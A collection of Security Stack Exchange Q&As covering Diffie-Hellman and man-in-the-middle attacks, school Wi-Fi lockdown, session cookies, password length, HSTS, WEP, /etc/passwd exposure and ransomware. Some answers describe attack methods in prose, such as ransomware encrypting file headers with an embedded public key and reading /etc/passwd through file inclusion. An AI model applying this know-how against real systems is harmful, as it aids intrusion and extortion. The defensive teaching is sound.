After reading the selected answer of "Diffie-Hellman Key Exchange" in plain English 5 times I can't, for the life of me, understand how it protects me from a MitM attack. Given the following excerpt (from tylerl's answer): I come up with two prime numbers g and p and tell you what they are. You then pick a secret number (a), but you don't tell anyone. Instead you compute g^a mod p and send that result back to me. (We'll call that A since it came from a.) I do the same thing, but we'll call my secret number b and the computed number B. So I compute g^b mod p and send you the result (called "B"). Now, you take the number I sent you and do the exact same operation with it. So that's B^a mod p. I do the same operation with the result you sent me, so: A^b mod p. Here are the same 5 steps with Alpha controlling the network: (1) You attempt to send me g and p, but Alpha intercepts and learns g and p. (2) You come up with a and attempt to send me the result of g^a mod p (A), but Alpha intercepts and learns A. (3) Alpha comes up with b and sends you the result of g^b mod p (B). (4) You run B^a mod p. (5) Alpha runs A^b mod p. During this whole process Alpha pretends to be you and creates a shared secret with me using the same method. Now, both you and Alpha, and Alpha and me, each have pairs of shared secrets. You now think it's safe to talk to me in secret, because when you send me messages encrypted with your secret Alpha decrypts them using the secret created by you and Alpha, encrypts them using the secret created by Alpha and me, then sends them to me. When I reply to you, Alpha does the same thing in reverse. Am I missing something here?
Diffie-Hellman is a key exchange protocol but does nothing about authentication. There is a high-level, conceptual way to see that. In the world of computer networks and cryptography, all you can see, really, are zeros and ones sent over some wires. Entities can be distinguished from each other only by the zeros and ones that they can or cannot send. Thus, user "Bob" is really defined only by his ability to compute things that non-Bobs cannot compute. Since everybody can buy the same computers, Bob can be Bob only by his knowledge of some value that only Bob knows. In the raw Diffie-Hellman exchange that you present, you talk to some entity that is supposed to generate a random secret value on-the-fly, and use that. Everybody can do such random generation. At no place in the protocol is there any operation that only a specific Bob can do. Thus, the protocol cannot achieve any kind of authentication -- you don't know who you are talking to. Without authentication, impersonation is feasible, and that includes simultaneous double impersonation, better known as Man-in-the-Middle. At best, raw Diffie-Hellman provides a weaker feature: though you do not know who you are talking to, you still know that you are talking to the same entity throughout the session. A single cryptographic algorithm won't get you far; any significant communication protocol will assemble several algorithms so that some definite security characteristics are achieved. A prime example is SSL/TLS; another is SSH. In SSH, a Diffie-Hellman key exchange is used, but the server's public part (its g^b mod p) is signed by the server. The client knows that it talks to the right server because the client remembers (from a previous initialization step) the server's public key (usually of type RSA or DSA); in the model explained above, the rightful server is defined and distinguished from imitators by its knowledge of the signature private key corresponding to the public key remembered by the client. That signature provides the authentication; the Diffie-Hellman then produces a shared secret that will be used to encrypt and protect all the data exchanges for that connection (using some symmetric encryption and MAC algorithms). Thus, while Diffie-Hellman does not do everything you need by itself, it still provides a useful feature, namely a key exchange, that you would not obtain from digital signatures, and that provides the temporary shared secret needed to encrypt the actually exchanged data.
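To see the "no authentication" point in code, here is a toy, deliberately insecure sketch of the raw exchange with tiny parameters: nothing in it ties a public value to an identity, so Alpha's values are just as acceptable to Alice as Bob's are.

```python
import secrets

# Toy parameters -- far too small for real use; illustration only.
p = 2_147_483_647      # a prime (2^31 - 1)
g = 5

def dh_keypair():
    secret = secrets.randbelow(p - 2) + 1
    return secret, pow(g, secret, p)

a, A = dh_keypair()                  # Alice
m, M = dh_keypair()                  # Alpha, answering in Bob's place

alice_view = pow(M, a, p)            # Alice thinks this is shared with Bob...
alpha_view = pow(A, m, p)            # ...but it is actually shared with Alpha
assert alice_view == alpha_view      # nothing in the protocol detects the swap
```

What SSH adds is a signature over the server's g^b mod p under a long-term key the client already knows; verifying that signature is the step no impersonator can perform.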
{ "source": [ "https://security.stackexchange.com/questions/91699", "https://security.stackexchange.com", "https://security.stackexchange.com/users/791/" ] }
91,961
I'm a teacher and IT person at a small K-12 school. The students are not supposed to have phones, laptops or access to the network. However, students being students they will try to find a way around the rules. The students manage to acquire the Wi-Fi passwords pretty much as soon as we change them. It becomes a game to them. Although they are not supposed to, they will bring their laptops and phones in and use the network. One of them will get the password, and it travels like wildfire throughout the school. It is sometimes as simple as writing it on a wall where the rest of the students can get the updated password. What can we do to keep them out of the network? I'm considering entering MAC addresses , but that's very labourious, and still not a guarantee of success if they spoof the address. Do any of you have any suggestions? Some background: There are four routers in a 50-year-old building (plenty of concrete walls). One router downstairs, and three upstairs. They are different brands and models (Netgear, Asus, Acer, D-Link) so no central administration. The school has about 30 Chromebooks and a similar number of iPads. Teachers will use their own laptops (a mix of Windows Vista, Windows 7, and Windows 8 as well as a number of Mac OS X). Some of the teachers are not at all comfortable with technology and will leave the room with their machines accessible to the students. The teachers will often leave their password off or even give it to the students when they need help. They will ask for help from the students when setting up a projector for example and leave them to it, there goes the security once again. No sooner that the teacher is out of the room than they'll go to the taskbar and look at the properties of the Wi-Fi router to get the password.
Enforce Consequences for Students Found on the Network The first thing you need to do is ensure you have a written policy outlining what devices are allowed on the network. However, if you are not consistent in the enforcement of your policy, it is useless. This should also cover the usage policies for the Teachers, including locking their computers when they are not present at the machine. You can also use Group Policy to prevent users from being able to view the WiFi password. Technical Measures The following consists of various options for limiting the use of student devices on the school network. The most effective is WPA2-Enterprise. The others are included because they may be effective enough in limiting unauthorized access by students and, depending on you particular network, may be easier to implement. However, the question suggests that the students are on the main network for the organization. Only WPA2-Enterprise is going to adequately protect your network from an attack of an unauthorized device. Once a PSK is known, a student has the ability to sniff teacher web traffic, and possibly capture email and windows hashes. Additionally, a malicious user could start attacking other machines directly. WPA2-Enterprise The best solution would be to implement WPA2-Enterprise, instead of using a pre shared key (WPA2-PSK). This allows individual credentials to be issued. This is implemented by installing client certificates on each machine. This requires a good bit of engineering and is not trivial to set up in larger environments. This page has some good pointers on how to deploy WPA2-Enterprise. Captive Portal As @Steve Sether mentioned, the Chillispot captive portal can be used to authenticate users once they have connected to the network. Although I don't have evidence to point to, I suspect such a portal can be bypassed by spoofing MAC and IP addresses. However, it does raise the difficulty and will be easier to manage than MAC Filtering on multiple devices. MAC Address Filtering As you mentioned, MAC addresses can be spoofed, so the effectiveness of MAC address filtering is limited. However, many phones prevent spoofing the MAC address, so this will address some of the problematic users. The iPhone for instance, needs to be jailbroken before the MAC address can be changed . The hardest part of using MAC address filtering is going to be managing the list of allowed MAC addresses especially across multiple devices from various vendors. I would also argue that there is 'legal' benefit of using MAC Address Filtering or a Captive Portal. It can be hard to claim a user was unauthorized to access a network when the password is written on a whiteboard. However, if a user has to explicitly bypass a security restriction, you have a stronger case against the activity. Using an Internet Proxy to Prevent Unauthorized Uses of HTTPS Implement a HTTPS solution that uses your own private key. You can install the corresponding certificate to the organization's machines and they won't notice anything different (though the organization should still tell the staff that HTTPS interception is occurring). However, unauthorized devices without the certificate will get a nasty message about HTTPS being invalid whenever they try to browse a secure page. Additionally, since you are decrypting the HTTPS traffic, you will be able to monitor the traffic. For instance, seeing which students log into Facebook will allow you to address those students directly. 
Many Content Control implementations offer the ability to decrypt HTTPS traffic. If the school already has a Content Control mechanism in place (such as Bluecoat or Net Nanny), talk to your vendor about how to implement this feature.
{ "source": [ "https://security.stackexchange.com/questions/91961", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78920/" ] }
91,964
"... they'll go to the taskbar and look at the properties of the WiFi router to get the password." is a quote from another question on this site , and is in the context of WiFi passwords. The password remaining accessible on a user's computer significantly after the user has logged in certainly seems like a security hole, although I don't know whether it's the OS's fault or the router's fault. What OSes and/or router's leave WiFi passwords accessible on a user's computer significantly after the user has logged in to WiFi?
{ "source": [ "https://security.stackexchange.com/questions/91964", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
92,122
I am learning about session middleware. You have to supply a secret or the middleware complains: app.use(session({ secret: "abc", resave: false, saveUninitialized: false, store: new MongoStore({ mongooseConnection: mongoose.connection }) })); I did some investigation and the actual session ID is eKeYlF1DR6AtVkeFZK9vEIHSZT8e0jqZ, but according to the cookie, the session ID is s%3AeKeYlF1DR6AtVkeFZK9vEIHSZT8e0jqZ.on5ifVE079C4ctKNdkNiJSh8NkQMckjd5fn%2FsxIQWCk. I am confused. Why is it insecure to store the session ID in the cookie directly? Can I not store the session ID directly? It looks like the secret is a private key and the session ID is being encrypted? As I understand it, if an attacker can obtain this cookie, maybe via XSS or social engineering, the attacker can still hijack the session. I am not sure what the point of the secret is.
The author of that JS library seems to have made a common, yet mistaken, assumption, though based on just enough knowledge to get things wrong. You can't just sprinkle magik crypto faerie dust and expect to get more security, like chocolate chips. What the author is missing is that once you sign the session id, and put that in the cookie - the signed session id IS the session id. That is literally the identifier with which end users will tell the server which session is theirs. It doesn't matter that the server will like to do some internal processing for associating the actual session identifier with the internal representation of the session's memory. To be clear, if the signed session id is stolen - in any way, whether via XSS, social engineering, or anything else - then the attacker will be able to simply use that signed session id to hijack the user's session, internal representation notwithstanding. That said, there is one nominal benefit in signing the cookie value before sending it to the browser: tamper detection. That is, upon receiving the user's cookie, the web application can verify that the cookie was not tampered with before using it to look up the session memory, namely by validating the signature. This might possibly prevent certain advanced / active attacks on the session management, by avoiding a session lookup on a session id that was never valid. However, this supposed benefit is doubtful, since the session id is typically just an id, used to look up the session variables. Also, most attacks targeting the session id would not be stopped by this - session hijacking, session fixation, session donation, session riding, etc... Anyway, if you really want to verify that the session cookie was not tampered with before using it, there are simpler ways than a digital signature...
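For reference, the "signature" in question is essentially an HMAC of the session id under the server-side secret. A rough sketch of the same idea in Python (hypothetical helper names -- this is not express-session's actual implementation, just the concept):

```python
import hashlib
import hmac

SECRET = b"abc"   # the server-side secret from the middleware config

def sign(session_id: str) -> str:
    tag = hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()
    return f"{session_id}.{tag}"

def verify(cookie_value: str):
    session_id, _, _tag = cookie_value.rpartition(".")
    if hmac.compare_digest(sign(session_id), cookie_value):
        return session_id    # untampered: safe to use for the session lookup
    return None              # forged or modified cookie

cookie = sign("eKeYlF1DR6AtVkeFZK9vEIHSZT8e0jqZ")
print(cookie)                # this whole value IS the credential the browser holds;
print(verify(cookie))        # anyone who steals it can replay it unchanged
```

Tamper detection works; theft protection does not -- which is the point of the answer above.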
{ "source": [ "https://security.stackexchange.com/questions/92122", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79089/" ] }
92,195
I am still in college for a Computer Security degree and took my first assembly language based class last semester. We touched upon the subject of reverse engineering and why it is an important part of fighting malware and ill-intentioned applications. During my class we mainly used IDA Pro, but also checked out some similar and free browser-based applications. In these applications, we were able to obtain so much information about the instructions and low level code that I was wondering why we even need a human to go over it and recreate the higher level languages (like writing a 'C' version of a piece of malware). Here is my question: Why can't a program use the information that is present in assembly code and turn it into a simplistic language automatically? I understand that it wouldn't look the exact same way it would when it was first written, but shouldn't it be possible to re-create it in a way that makes it easier to read and follow? It's just something that I can't wrap my head around, thanks!
Short Answer It's absolutely possible, but the accuracy and readability are a completely different matter. One clarification to be made: Reverse Engineering is not Decompiling. Long Answer Reverse Engineering is generally the process by which you take something (anything really) apart to see how it works. Disassembling is when you take a binary formatted file and interpret the machine code into its assembly code. Decompiling is interpreting the assembly code into a higher level language. I believe your question is really, Why can't decompiling a program be automated? Well it can be! There are several different Java decompilers. Java byte-code is completely reversible due to its architecture independence. What becomes tricky is decompiling a language like C. Hex Rays does provide a C decompiler, but C is a complicated language. There are 10 different ways to accomplish the same task. What can be done in 20 lines can be done in 3, or 10. It's the interpretation of the language that makes the automation of decompiling C difficult. Sure you can decompile C to its most simplistic instructions. Then you get lines like **(*var1) = 3; or (*bytecode)(param1), which can be a call to a function pointer. What's worse is that you must remember that these are still just an interpretation. I can't stress that enough. What if the interpretation is wrong? This is something you have to worry about at the disassembly level, but at least there are a reasonable number of outcomes for the 5-6 bytes of an instruction. Now you have to interpret 15-20 bytes in order to figure out a function call or a for-loop. If there are anti-reverse-engineering techniques then it makes the interpretation even more difficult. Context plays a huge role. What's the difference between a function pointer, a char * pointer, and a uint32? Absolutely nothing, except the context in which it's used. Compiler optimizations might use __fastcall rather than __stdcall, which means now you have to interpret where parameters to functions are going to be: on the stack or in a register. Inline functions, macros, and #defines will all become part of a larger subroutine. There's no real way to interpret those types of contexts.
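A cheap way to get a feel for the "many sources, one behaviour" problem is Python's own dis module, using bytecode as a stand-in for machine code: the disassembly step is mechanical and exact, but deciding which of two equivalent source functions a given instruction stream "really" came from is already interpretation.

```python
import dis

def sum_a(values):
    total = 0
    for v in values:
        total += v
    return total

def sum_b(values):
    total = 0
    i = 0
    while i < len(values):
        total = total + values[i]
        i = i + 1
    return total

dis.dis(sum_a)   # disassembly: produced automatically, no ambiguity
dis.dis(sum_b)   # same observable behaviour, different instruction stream
```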
{ "source": [ "https://security.stackexchange.com/questions/92195", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79164/" ] }
92,233
Is keeping your password length secret critical to security? Does someone knowing that you have a password length of say 17 make the password drastically easier to brute force?
Well, let's start with math: If we assume that your password consists of lowers, uppers, and numbers, that's 62 characters to choose from (just to keep the math easy, real passwords use symbols too). A password of length 1 has 62 possibilities, a password of length 2 has 62^2 possibilities, ..., a password of length n has 62^n possibilities. So that means that if they know your password has exactly 17 characters, then they can skip all the passwords with length less than 17, and there are only 62^17 passwords to try. But how many passwords are there with length less than 17, compared to 62^17? Well, if we add up 62^n and divide by 62^17 we get (sum from n=1 to n=16 of 62^n ) / 62^17 = 0.016 ( link to calculation ), so checking only passwords of length 17 is only 1.6% faster than checking all passwords up to length 17 If we have a password scheme which allows all 95 printable ASCII characters , then the savings from not having to try passwords shorter than 17 drops to 1.06% ( link to calculation ). An interesting mathematical quirk about this ratio of the number of passwords shorter than n, over the number of passwords of length n, is that it doesn't really depend on n. This is because we're already very close to the asymptote of 1/95 = 0.0105. So an attacker gets the same relative, or percentage, time savings from this trick regardless of the length of your password; it's always between 1% - 2%. Though, of course, the absolute time that it takes grows orders of magnitude with each new character that you add. The maths above assume a simple brute-forcer which will try a, b, c, ..., aa, ab, ... Which is a good(ish) model for cracking properly-random computer-generated passwords, but is a terrible model for guessing human-generated passwords. Real password crackers are dictionary-based, trying words (and combinations of words) from the English dictionary, lists of leaked passwords, etc, so those calculations should be taken with a grain of salt. Another effect of knowing your length is that they don't have to try any passwords longer than 17 , which for brute-forcing algorithms that try combinations of dictionary words, could actually be a huge savings. As mentioned by @SteveSether, @xeon, and @CountIblis, disclosing the length (or entropy) of a password can also effect whether an attacker even attempts to crack your password by deterring them away from strong passwords and instead attracting them to weak ones. So if you know you have a strong password, then disclose away! However, disclosing the password lengths (or entropies) for all users in a system has the effect of making strong passwords stronger, and weak passwords weaker. Bottom Line: Telling someone the length of your password isn't the worst thing you can do, but I still wouldn't do it.
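The two ratios quoted above are easy to reproduce yourself (a quick check of the 1.6% and 1.06% figures):

```python
def skip_fraction(alphabet_size: int, length: int) -> float:
    """Fraction of the search space taken up by passwords shorter than `length`."""
    shorter = sum(alphabet_size ** n for n in range(1, length))
    return shorter / alphabet_size ** length

print(skip_fraction(62, 17))   # ~0.0164 -> roughly 1.6% of the work saved
print(skip_fraction(95, 17))   # ~0.0106 -> roughly 1.06% saved
```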
{ "source": [ "https://security.stackexchange.com/questions/92233", "https://security.stackexchange.com", "https://security.stackexchange.com/users/43059/" ] }
92,292
Since TLS is preferred over SSL, why do we still use the terms SSL and HTTPS generally? The former could be anecdotal, but most people I speak to still say SSL in general conversation. The term HTTPS is more objective, since that means HTTP over SSL. Why don't we say HTTPT (HTTP over TLS) and use the scheme httpt://?
Huge effort. Little technical return. Introducing a new scheme (schemes are e.g. http:// , https:// , ftp:// , etc.) and deploying it would mean breaking backwards compatibility. Not worth it. Political rather than technical Ivan Ristic devotes some sentences in the introduction to his book to this. The book is called Bulletproof SSL and TLS . You've got both the "SSL" and "TLS" right in the title. (Go figure.) The introductory chapter is free online . The naming controversy is mentioned in section "SSL versus TLS" (page xix) and section "Protocol History" (page 3). It seems the whole reason for renaming from SSL to TLS was political rather than technical. Ristic's footnotes link to the blog of Tim Dierks. Dierks wrote the SSL 3.0 reference implementation in 1996 and this is his take on the naming: Tim Dierks, 2014-05-23, Security Standards and Name Changes in the Browser Wars (archived here ): As a part of the horsetrading, we had to make some changes to SSL 3.0 (so it wouldn't look [like] the IETF was just rubberstamping Netscape's protocol), and we had to rename the protocol (for the same reason). And thus was born TLS 1.0 (which was really SSL 3.1). And of course, now, in retrospect, the whole thing looks silly. Further reading Here's another take on the naming. It's by Mike McCana (who operates a CA himself): Mike McCana, CertSimple.com blog, 2016-01-05, Why do we still say SSL? (Archived here .)
{ "source": [ "https://security.stackexchange.com/questions/92292", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79286/" ] }
92,538
I have a router and I'm the only user. I have a computer with Linux and a tablet with Windows 8.1. Because of a few problems, I had to reinstall Windows on the tablet. Since I'm a bit paranoid about viruses and malware, I would like to ask: Even if I only used the Internet to download Windows updates and get the antivirus software from the official website (using IE), is it possible to get infected only by staying connected to the Internet (doing nothing else)? Also note that I never had both computer and tablet connected at the same time. I read somewhere that it is possible to get the router infected, so to prevent this, I'm doing almost everything with care.
A few years ago (2003), there was this worm called "Blaster" (or MSBlast, Lovesan etc. - read more on https://en.wikipedia.org/wiki/Blaster_(computer_worm) ). It spread by using a vulnerability in an RPC service, running on Windows XP and 2000. At the time where it was "worst", you could get infected within minutes, if you didn't have a firewall set up. I remember installing a clean Windows XP, putting it online (without a firewall), and watch it get infected within minutes. So to answer your question: Yes, if you're connected to the internet, you're vulnerable as long as there's open ports with services listening on them (and there's a vulnerability in the software). So you can definitely get infected by just being online and not doing anything. Remember, even if you're not doing anything, your computer is still connected to various services online and using the internet.
{ "source": [ "https://security.stackexchange.com/questions/92538", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79507/" ] }
92,721
I have heard that it is better to never click any link in an email. Is it a bad idea to click an unsubscribe link? What is the best way to unsubscribe from undesired mail?
You should not click on any links. By clicking on the "unsubscribe" link you will probably get marked as an "active reader" who is willing to interact. You also land on the sender's page, which could infect you with malware. Remember: by clicking any link you've confirmed to the sender that your email address is both valid and in active use. Just delete and ignore the message. Your email address might then get marked as "inactive".
{ "source": [ "https://security.stackexchange.com/questions/92721", "https://security.stackexchange.com", "https://security.stackexchange.com/users/54270/" ] }
92,766
On the exploit websites I see security analysts and hackers targeting the /etc/passwd file when showing the proof of concept. If you have a local file inclusion or path traversal vulnerability on your server, and hackers are able to access (view, read, but NOT edit) the /etc/passwd file, what are the repercussions of this? Aren't all passwords obfuscated in this file by design?
The only real repercussion is reconnaissance - the attacker can learn login names and gecos fields (which sometimes help guess passwords) from the /etc/passwd file. One reason for this is that, 20 years ago or so, most Unix variants shifted from keeping hashed passwords in the /etc/passwd file and moved them to /etc/shadow . The reason for this was that /etc/passwd needed to be world readable for tools like 'finger' and 'ident' to work. Once passwords were segregated into /etc/shadow , that file was made readable only by root. That said, /etc/passwd remains a popular 'flag' for security analysts and hackers because it's a traditional "hey, I got what I shouldn't" file. If you can read that, you can read other things under /etc as well, some of which can be useful to an attacker. But it's harder to test for (say) /etc/yum.conf if you don't know if yum's on the system; /etc/passwd is always there and is a reliable test of whether access worked. Put differently, the implicit repercussion of getting /etc/passwd is that the attacker has circumvented controls and can get arbitrary readable files, which means "I win!"* *No actual guarantee of win, express or implied
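If you want to see exactly what an attacker gains, the standard pwd module dumps the same fields the file exposes -- login names, UIDs, gecos comments and shells, but no password material on any modern system (a local sketch, run on your own machine):

```python
import pwd

for entry in pwd.getpwall():
    # pw_passwd is just "x" or "*" on modern systems; the real hash lives in /etc/shadow
    print(entry.pw_name, entry.pw_uid, entry.pw_gecos, entry.pw_shell, entry.pw_passwd)
```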
{ "source": [ "https://security.stackexchange.com/questions/92766", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79804/" ] }
92,767
I am working on a web-service based crypto project in JAVA. The basic idea is for the client to send a SOAP request to a servlet to encrypt data. For data transmission I am using MIME/data-handlers and I noticed that MIME stores the data being transmitted in a temporary file if the size is larger then a given amount. Even though this file will be garbage collected I would prefer it to not even be on my system. Thus, I have been writing this temporary file to /dev/null. As this is just a project it is not the end of the world if someone could still read the temp file but it made me think about a production environment where this could be a huge issue. Is writing to /dev/null safe and secure? Is it the same as not writing the file at all? Could someone still access the plaintext temp file that is being written ie, as it is being written?
{ "source": [ "https://security.stackexchange.com/questions/92767", "https://security.stackexchange.com", "https://security.stackexchange.com/users/66321/" ] }
92,954
My question is about Firefox and Chrome. Is there a possibility to see which sites have set the HSTS flag in my browser?
Chrome : Open Chrome Type chrome://net-internals/#hsts in the address bar of chrome Query domain: if it appears as a result, it is HSTS-enabled Firefox : Open file explorer Copy and paste the following path into the address bar of your file explorer On Windows : %APPDATA%\Mozilla\Firefox\Profiles\ On Linux : ~/.mozilla/firefox On Mac : ~/Library/Application Support/Firefox/Profiles Double click the folder you see (if you have multiple Firefox profiles, there will be multiple folders) Open SiteSecurityServiceState.txt . This textfile contains sites that have enabled HSTS.
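If you'd rather script the Firefox check, the state file is plain text with one entry per line and the host name at the start of each line. A rough sketch -- note that the exact column layout differs between Firefox versions, so the parsing here is an assumption, not a documented format:

```python
from pathlib import Path

profiles = Path.home() / ".mozilla" / "firefox"            # adjust the path for your OS
for state_file in profiles.glob("*/SiteSecurityServiceState.txt"):
    print(f"--- {state_file} ---")
    for line in state_file.read_text().splitlines():
        host = line.split("\t")[0].split(":")[0]           # assumed: host before first tab/colon
        print(host)
```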
{ "source": [ "https://security.stackexchange.com/questions/92954", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70038/" ] }
92,955
I'm writing a .NET desktop application that is used to send orders to a server via a REST API. To avoid leaking of our authentication token I have made it so that, when used for the first time, the user has to submit the authentication token and a password to encrypt it with. The encryption algorithm is AES-256-CBC and the scheme is as follows: the password is hashed before it's used by the algorithm, the salt used for hashing is the computer GUID so just copying the program files will not suffice, and the IV is randomly generated and concatenated with the cipher. When the user opens the program thereafter, he or she is asked for a password, decryption is started, and when the authentication token does not match the required mask it will return an error. So far so good I'd say. However , my supervisor is not yet content with the level of security: he wants the program to log all orders that have been sent to the server in case of administrative anomalies by the third party that hosts the server, just so that we have a reference with a reasonable level of credibility (though I suppose you could just call it 'proof' in case their administration fails). The 'credibility' part is where any straightforward implementation of a logfile goes right out the window, it wouldn't provide: Integrity: No person (including the user) is allowed to modify the logfile with content that does not reflect actual usage of the program. The log can only be appended, only when the program's main function is used, and only by the program itself. Confidentiality: The contents of the log can only be summoned by the user of the program (the password prompt will aid in identification of the user). I've tried to come up with a cryptographic scheme (digital signing) encrypting every record that is appended to the log and encrypt the public key with the user's password, but this doesn't solve half the problem: the private key would have to be stored by the program anyhow, so strictly speaking it means the user has access to it and have the ability to modify the log. Is there a method or scheme that meets these requirements?
{ "source": [ "https://security.stackexchange.com/questions/92955", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80138/" ] }
92,985
Why would anyone like Edward Snowden rely on 3rd party services like Lavabit or Hushmail to host his email? I mean it's very easy to set up a self-hosted email server. What you need: Rent VPS (even better: home server) & Domain (May take up to 2 days, who cares..) Set up Firewall (20 min) Secure SSH (10 min) Install and set up Postfix & Dovecot (1 hour) DKIM, SPF, DMARC, DNSSEC, DANE & co if you want. (1 hour - 2 hours) Secure everything again and test (30 minutes - 2 hours) Isn't such a setup "more secure" than relying on a 3rd party email service? Why do so many security experts (i.e. cryptologists & co.) not host their own email?
Rent VPS (even better: home server) & Domain (May take up to 2 days, who cares..) How many ISPs do not provide law enforcement access to their sites and to the systems they provide for their customers? And with a home server: lots of sites explicitly deny access to their mail server from a "home" IP address (these are known address blocks), in order to fight spam. And even if you manage this: are you home all day or are you sure to detect any kind of break-in? Please note that you are not up against the average burglar. Secure everything again and test (30 minutes - 2 hours) What you've described might help to protect your privacy against Google etc (at least the emails). Against the NSA it is probably not sufficient. If they really want to own you they can send clever phishing mails with malware, use malvertising to attack you, simply break into your home, and much more. Why do so many security experts (i.e. cryptologists & co.) not host their own email? Security is a very wide field and I'm sure lots of crypto experts probably have no idea of how to set up and properly secure a mail server. Also lots of mail administrators have no idea of deeper cryptography. They are all experts in their own field and they are not able to know everything. This means they either learn to be expert in another field and have less time for their own field, or they have to find a way to outsource such tasks to somebody they trust. DKIM, SPF, DMARC, DNSSEC, DANE & co if you want. (1 hour - 2 hours) These are definitely not easy. You have to find first somebody who lets you do DNSSec with your own domain. Most ISPs or even dedicated DNS providers don't. And to have DKIM, SPF, or DANE you either need to use your own DNS server with all the problems (need primary and secondary for availability etc) or have again to find a provider which lets you set all these records up. These short times you give are definitely not realistic for somebody who is doing this for the first time.
{ "source": [ "https://security.stackexchange.com/questions/92985", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80176/" ] }
93,014
My company has an ISO 27001 certification. They provided me a new laptop with Windows 8 OS in it. I asked if I can have a Linux/Ubuntu OS installed, they said that it is not possible due to the ISO 27001 standards. Is it true or do the technical people of the company not know how to install Linux/Ubuntu?
One of the ISO 27001 requirements is management of access control to the company's IT resources. If you just install Ubuntu on your laptop, all the access control will be managed by you directly instead of by your company. So if, for example, your manager wants to fire you, your IT department won't be able to block your local laptop account at the right moment. Of course Linux can be connected to central authentication systems (AD, IPA, CAS etc.), but first your IT department needs to build the required competences (a single employee knowing how to do that is not enough, since all ISO standards require written, repeatable and verifiable processes). On the other hand, knowledge of how to connect Windows to AD and deploy central authentication is more or less common in IT, so your company probably already has ISO processes for it. Therefore, they only allow you to use Windows.
{ "source": [ "https://security.stackexchange.com/questions/93014", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80194/" ] }
93,128
To me, encrypting a file is akin to dealing with a very long string: feeding it into the hashing or encryption function to get another long encrypted string (or a hash, in the case of hashing). This process takes a good amount of time. I know that because I use HashTab to verify the integrity of the files I download off the Internet. How can ransomware like CTB-Locker or Crypt0l0cker encrypt its victims' files instantly? Recently a friend of mine was the victim of one of these ransomware programs, and he could NOT open his files/photos from Ubuntu on his dual-OS machine even though the infection happened in MS Windows. This suggests the encryption does not happen on the fly when you open a file.
I was at an OWASP talk where the speaker decompiled and analyzed a ransomware executable (for Windows) in front of us. There are many flavours of ransomware out there, so I can't speak to ransomware in general, but I can certainly talk about the one I saw. The general idea is that the ransomware executable contains the encryption public key needed to encrypt files using an asymmetric algorithm, for example RSA. The corresponding private / decryption key stays with the hackers so that no amount of reverse-engineering of the executable can give you the decryption key. To actually encrypt a file, it does something similar to: Skip the first 512 bytes of the file so that the file header stays intact. Encrypt the next 1 MB using the embedded encryption key. If the file is longer than this, leave the rest unencrypted. The point is not to fully hide or protect the data, it's enough to make it un-parseable. As for time, doing 1 MB of RSA is still slow and will still take several hours to crawl your HDD. I suspect that this specimen that I saw was just a lazy imitation of the full RSA-AES ransomware that Steffen Ullrich talked about in his answer - which is the one that you should really be worried about.
{ "source": [ "https://security.stackexchange.com/questions/93128", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31356/" ] }
93,149
For some days, I had the feeling that my Internet bill was booming. Then I found out that a boy near my house was accessing my router to use the Internet. I read some articles about how to crack WEP security and found that it is way too easy to crack WEP. So I was looking for some ways to increase the security of an AP that uses the WEP protocol, but I didn't find anything. My router does not support WPA/WPA2. So how can I make my router more secure, I mean uncrackable?
There is no method to make WEP uncrackable, or even reasonably secure. So I suggest buying a new router that supports WPA2.
{ "source": [ "https://security.stackexchange.com/questions/93149", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78238/" ] }
93,162
How do I find out if a certificate is self-signed or signed by a CA? Somewhere I read that for a self-signed certificate the subject and issuer will be the same; is that correct?
Yes, it is true. When a certificate is self-signed, the issuer and subject fields contain the same value. Also, there will be only this one certificate in the certificate path.
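As a rough illustration of that check (an assumption-laden sketch, not part of the original answer: it uses the third-party cryptography package and a placeholder file name cert.pem, and a matching subject and issuer only suggests self-signing; it does not verify the signature itself):

```python
from cryptography import x509

with open("cert.pem", "rb") as f:          # placeholder path, assumed PEM-encoded
    cert = x509.load_pem_x509_certificate(f.read())

print("Subject:", cert.subject.rfc4514_string())
print("Issuer :", cert.issuer.rfc4514_string())
print("Subject == issuer (likely self-signed):", cert.subject == cert.issuer)
```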
{ "source": [ "https://security.stackexchange.com/questions/93162", "https://security.stackexchange.com", "https://security.stackexchange.com/users/64041/" ] }
93,322
I first thought all these terms were synonyms, but I sometimes see them used in the same document. For instance, on MSDN: data origin authentication, which enables the recipient to verify that messages have not been tampered with in transit (data integrity) and that they originate from the expected sender (authenticity). I don't completely understand how integrity is different from authenticity. How could it be possible to ensure only the authenticity of the sender without data integrity? If an attacker is able to modify the content, how can we trust the sender field to be correct? Similarly, what does it mean to know that some data has integrity without knowing the sender? To me, it's just a matter of whether or not the "Sender" field of the header is included in the part of the message that's checked for integrity (or authenticity; I'm confused now). As far as I know, digital signatures solve both integrity and authenticity; maybe that's why I can't see the difference between the two.
Integrity is about making sure that some piece of data has not been altered from some "reference version". Authenticity is a special case of integrity, where the "reference version" is defined as "whatever it was when it was under control of a specific entity". Authentication is about making sure that a given entity (with whom you are interacting) is who you believe it to be. In that sense, you get authenticity when integrity and authentication are joined together. If you prefer, authenticity is authentication applied to a piece of data through integrity. For instance, consider that you use your browser to connect to some https:// Web site. This means SSL. There is authentication during the initial handshake: the server sends its certificate and uses its private key, and the server's certificate contains the server's name; your browser checks that the server's name matches what was expected (the server name part in the URL). Then all the exchanged data is sent as "records" which are encrypted and protected against alteration: this is integrity . Since your browser receives data that is guaranteed unmodified from what it was when it was sent by a duly authenticated server, the data can be said to be "authentic". Don't overthink things. The terminology is at least half traditional, meaning that it is not necessarily practical. We like to talk about the triad "Confidentiality - Integrity - Authenticity" mostly because it makes the acronym "CIA", which looks cool.
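To make the distinction a bit more concrete, here is a small illustrative sketch (my addition, not from the original answer) using an HMAC: a matching tag tells the recipient both that the data was not altered (integrity) and that it was produced by someone holding the shared key (origin authentication), which together give authenticity in the sense described above. The key and message are made-up placeholders.

```python
import hmac
import hashlib

key = b"pre-shared secret between sender and recipient"   # placeholder
message = b"transfer 100 EUR to account 42"

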